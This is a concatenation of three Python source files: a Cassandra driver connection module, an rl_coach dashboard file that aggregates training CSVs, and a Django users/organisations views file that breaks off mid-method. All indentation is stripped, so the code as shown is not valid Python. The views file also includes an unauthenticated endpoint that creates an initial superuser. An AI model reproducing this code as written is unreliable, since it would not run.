self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
self.lock = RLock()
self.connected_event = Event()
@property
def host(self):
return self.endpoint.address
@property
def port(self):
return self.endpoint.port
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, endpoint, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(endpoint, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(endpoint, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
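    # Resolve the endpoint and try every address returned by getaddrinfo until a plain or
    # SSL-wrapped socket connects; if all candidates fail, re-raise the last socket error.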
def _connect_socket(self):
sockerr = None
inet_address, port = self.endpoint.resolve()
addresses = socket.getaddrinfo(inet_address, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.endpoint,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_context:
self._socket = self.ssl_context.wrap_socket(self._socket,
**(self.ssl_options or {}))
elif self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.endpoint.address)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.endpoint, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.endpoint, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.endpoint, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.endpoint)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.endpoint)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None, **kwargs):
return self.wait_for_responses(msg, timeout=timeout, **kwargs)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.endpoint)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.endpoint)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.endpoint)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.endpoint))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {'DRIVER_NAME': DRIVER_NAME,
'DRIVER_VERSION': DRIVER_VERSION}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
if self.authenticator:
log.warning("An authentication challenge was not sent, "
"this is suspicious because the driver expects "
"authentication (configured authenticator = %s)",
self.authenticator.__class__.__name__)
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.endpoint)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.endpoint, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.endpoint, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.endpoint))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.endpoint, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.endpoint)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.endpoint, auth_response)
raise ProtocolError(msg % (self.endpoint, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.endpoint)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.endpoint)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.endpoint)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s%s>" % (self.__class__.__name__, id(self), self.endpoint, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.endpoint)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.endpoint)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.endpoint)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.endpoint)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.endpoint)
                            # make sure the owner sees this defunct/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.endpoint)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
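# A minimal, self-contained sketch (added for illustration; not part of the
# driver) of how the Timer/TimerManager pair above cooperate: a client thread
# registers a Timer, and an event loop repeatedly calls service_timeouts()
# until the queue drains and the callback has fired.
if __name__ == "__main__":
    _manager = TimerManager()
    _fired = []
    _manager.add_timer(Timer(0.05, lambda: _fired.append("expired")))
    while _manager.service_timeouts() is not None:
        time.sleep(0.01)
    print(_fired)  # expected: ['expired']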
|
signals_files_group.py
|
import os
from multiprocessing import Process, Manager
from os.path import basename
import pandas as pd
from rl_coach.dashboard_components.globals import x_axis_options, add_directory_csv_files, show_spinner, x_axis
from rl_coach.dashboard_components.signals_file_base import SignalsFileBase
from rl_coach.dashboard_components.signals_file import SignalsFile
class SignalsFilesGroup(SignalsFileBase):
def __init__(self, csv_paths, plot=None):
super().__init__(plot)
self.full_csv_paths = csv_paths
self.signals_files = []
if len(csv_paths) == 1 and os.path.isdir(csv_paths[0]):
self.signals_files = [SignalsFile(str(file), load=False, plot=plot) for file in add_directory_csv_files(csv_paths[0])]
else:
for csv_path in csv_paths:
if os.path.isdir(csv_path):
self.signals_files.append(SignalsFilesGroup(add_directory_csv_files(csv_path), plot=plot))
else:
self.signals_files.append(SignalsFile(str(csv_path), load=False, plot=plot))
parent_directory_path = os.path.abspath(os.path.join(os.path.dirname(csv_paths[0]), '..'))
if len(os.listdir(parent_directory_path)) == 1:
# get the parent directory name (since the current directory is the timestamp directory)
self.dir = parent_directory_path
else:
# get the common directory for all the experiments
self.dir = os.path.dirname('/'.join(os.path.commonprefix(csv_paths).split('/')[:-1]) + '/')
self.filename = '{} - Group({})'.format(basename(self.dir), len(self.signals_files))
self.signal_files_need_update = False
self.load()
def load_csv(self):
global x_axis
# load the csv's for all workers
processes = []
results = Manager().dict()
corrupted_files_idx = []
for idx, signal_file in enumerate(self.signals_files):
if not isinstance(signal_file, SignalsFilesGroup):
processes.append(Process(target=signal_file.load_csv, args=(idx, results)))
processes[-1].start()
[p.join() for p in processes]
# load csv's for SignalsFilesGroup serially for now. TODO: we should later parallelize this as well.
for idx, signal_file in enumerate(self.signals_files):
if isinstance(signal_file, SignalsFilesGroup):
signal_file.load_csv()
for idx, signal_file in enumerate(self.signals_files):
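            # `results` only has entries for plain SignalsFile workers that were
            # loaded in subprocesses above; nested groups already loaded serially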
            if idx in results:
signal_file.csv, signal_file.last_modified = results[idx]
if not all(option in signal_file.csv.keys() for option in x_axis_options):
print("Warning: {} file seems to be corrupted and does contain the necessary columns "
"and will not be rendered".format(signal_file.filename))
corrupted_files_idx.append(idx)
# remove corrupted worker files
        for file_idx in sorted(corrupted_files_idx, reverse=True):  # delete from the end so earlier indices stay valid
del self.signals_files[file_idx]
# get the stats of all the columns
if len(self.signals_files) > 1:
transformed_signals_files = []
subsampling = None
for idx in range(len(self.signals_files)):
transformed_signals_files.append(self.signals_files[idx].csv.copy(deep=True))
# change the index to be the currently selected x axis
transformed_signals_files[-1].index = transformed_signals_files[-1][x_axis[0]]
# remove all duplicate index rows
transformed_signals_files[-1] = transformed_signals_files[-1][~transformed_signals_files[-1].index.duplicated()]
# fill up missing row indices. we are going to take the mean over the group and we want to make sure
# the entire group has some value for every possible index.
num_rows = int(transformed_signals_files[-1].index.values[-1])
transformed_signals_files[-1] = transformed_signals_files[-1].reindex(range(num_rows))
transformed_signals_files[-1].interpolate(inplace=True)
# sub sample the csv to max of 5000 indices (do the same subsampling to all files)
if subsampling is None:
subsampling = max(1, num_rows // 5000)
transformed_signals_files[-1] = transformed_signals_files[-1].iloc[::subsampling, :]
csv_group = pd.concat([signals_file for signals_file in transformed_signals_files])
columns_to_remove = [s for s in csv_group.columns if '/Stdev' in s] + \
[s for s in csv_group.columns if '/Min' in s] + \
[s for s in csv_group.columns if '/Max' in s]
for col in columns_to_remove:
del csv_group[col]
csv_group = csv_group.groupby(csv_group.index)
self.csv_mean = csv_group.mean()
self.csv_mean.columns = [s + '/Mean' for s in self.csv_mean.columns]
self.csv_stdev = csv_group.std()
self.csv_stdev.columns = [s + '/Stdev' for s in self.csv_stdev.columns]
self.csv_min = csv_group.min()
self.csv_min.columns = [s + '/Min' for s in self.csv_min.columns]
self.csv_max = csv_group.max()
self.csv_max.columns = [s + '/Max' for s in self.csv_max.columns]
# get the indices from the file with the least number of indices and which is not an evaluation worker
file_with_min_indices = transformed_signals_files[0]
for signals_file in transformed_signals_files:
if signals_file.shape[0] < file_with_min_indices.shape[0] and \
'Training reward' in signals_file.keys():
file_with_min_indices = signals_file
self.index_columns = file_with_min_indices[x_axis_options]
# concat the stats and the indices columns
num_rows = file_with_min_indices.shape[0]
self.csv = pd.concat([self.index_columns, self.csv_mean.head(num_rows), self.csv_stdev.head(num_rows),
self.csv_min.head(num_rows), self.csv_max.head(num_rows)], axis=1)
# remove the stat columns for the indices columns
columns_to_remove = [s + '/Mean' for s in x_axis_options] + \
[s + '/Stdev' for s in x_axis_options] + \
[s + '/Min' for s in x_axis_options] + \
[s + '/Max' for s in x_axis_options]
for col in columns_to_remove:
if col in self.csv.keys():
del self.csv[col]
else: # This is a group of a single file
self.csv = self.signals_files[0].csv
# remove NaNs
self.csv.fillna(value=0, inplace=True) # removing this line will make bollinger bands fail
for key in self.csv.keys():
if 'Stdev' in key and 'Evaluation' not in key:
self.csv[key] = self.csv[key].fillna(value=0)
self.signal_files_need_update = True
def reload_data(self):
SignalsFileBase.reload_data(self)
def update_x_axis_index(self):
SignalsFileBase.update_x_axis_index(self)
# update the x axis for the bollinger bands
for signal in self.signals.values():
if signal.has_bollinger_bands:
signal.set_bands_source()
def toggle_y_axis(self, signal_name=None):
for signal in self.signals.values():
if signal.selected:
signal.toggle_axis()
def change_averaging_window(self, new_size, force=False, signals=None):
SignalsFileBase.change_averaging_window(self, new_size, force, signals)
def set_signal_selection(self, signal_name, val):
self.show_files_separately(self.separate_files)
SignalsFileBase.set_signal_selection(self, signal_name, val)
def file_was_modified_on_disk(self):
for signal_file in self.signals_files:
if signal_file.file_was_modified_on_disk():
return True
return False
def show_files_separately(self, val):
self.separate_files = val
# lazy updating of the signals of each of the workers
if self.separate_files and self.signal_files_need_update:
for signal_file in self.signals_files:
signal_file.update_source_and_signals()
self.signal_files_need_update = False
for signal in self.signals.values():
if signal.selected:
if val:
signal.set_dash("4 4")
else:
signal.set_dash("")
for signal_file in self.signals_files:
try:
if val:
signal_file.set_signal_selection(signal.name, signal.selected)
else:
signal_file.set_signal_selection(signal.name, False)
except:
pass
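# A toy, self-contained sketch (illustration only; the data below is made up)
# of the per-index aggregation performed in load_csv() above: concatenate the
# workers' frames, group rows by index, and derive the stat columns
# (here just Mean and Stdev) that the dashboard plots as bollinger bands.
if __name__ == '__main__':
    _workers = [pd.DataFrame({'Training reward': [1.0, 2.0, 3.0]}),
                pd.DataFrame({'Training reward': [2.0, 4.0, 6.0]})]
    _group = pd.concat(_workers).groupby(level=0)
    _mean = _group.mean().add_suffix('/Mean')
    _stdev = _group.std().add_suffix('/Stdev')
    print(pd.concat([_mean, _stdev], axis=1))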
|
views.py
|
from threading import Thread
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponse
from django.shortcuts import redirect, get_object_or_404
from django.views import View
from drf_yasg.utils import swagger_auto_schema
from rest_framework import viewsets, status, mixins
from rest_framework.decorators import api_view, action
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from organisations.models import Organisation
from organisations.permissions import OrganisationUsersPermission, \
UserPermissionGroupPermission
from organisations.serializers import OrganisationSerializerFull, UserOrganisationSerializer
from users.exceptions import InvalidInviteError
from users.models import FFAdminUser, Invite, UserPermissionGroup
from users.serializers import UserListSerializer, UserPermissionGroupSerializerDetail, UserIdsSerializer
class AdminInitView(View):
def get(self, request):
if FFAdminUser.objects.count() == 0:
admin = FFAdminUser.objects.create_superuser(
settings.ADMIN_EMAIL,
settings.ADMIN_INITIAL_PASSWORD,
is_active=True,
)
admin.save()
return HttpResponse("ADMIN USER CREATED")
else:
return HttpResponse("FAILED TO INIT ADMIN USER. USER(S) ALREADY EXIST IN SYSTEM.")
class FFAdminUserViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
permission_classes = (IsAuthenticated, OrganisationUsersPermission)
pagination_class = None
def get_queryset(self):
if self.kwargs.get('organisation_pk'):
return FFAdminUser.objects.filter(organisations__id=self.kwargs.get('organisation_pk'))
else:
return FFAdminUser.objects.none()
def get_serializer_class(self, *args, **kwargs):
if self.action == 'update_role':
return UserOrganisationSerializer
return UserListSerializer
def get_serializer_context(self):
context = super(FFAdminUserViewSet, self).get_serializer_context()
if self.kwargs.get('organisation_pk'):
context['organisation'] = Organisation.objects.get(pk=self.kwargs.get('organisation_pk'))
return context
@action(detail=True, methods=['POST'], url_path='update-role')
def update_role(self, request, organisation_pk, pk):
user = self.get_object()
organisation = Organisation.objects.get(pk=organisation_pk)
user_organisation = user.get_user_organisation(organisation)
serializer = self.get_serializer(instance=user_organisation, data=request.data, partial=True)
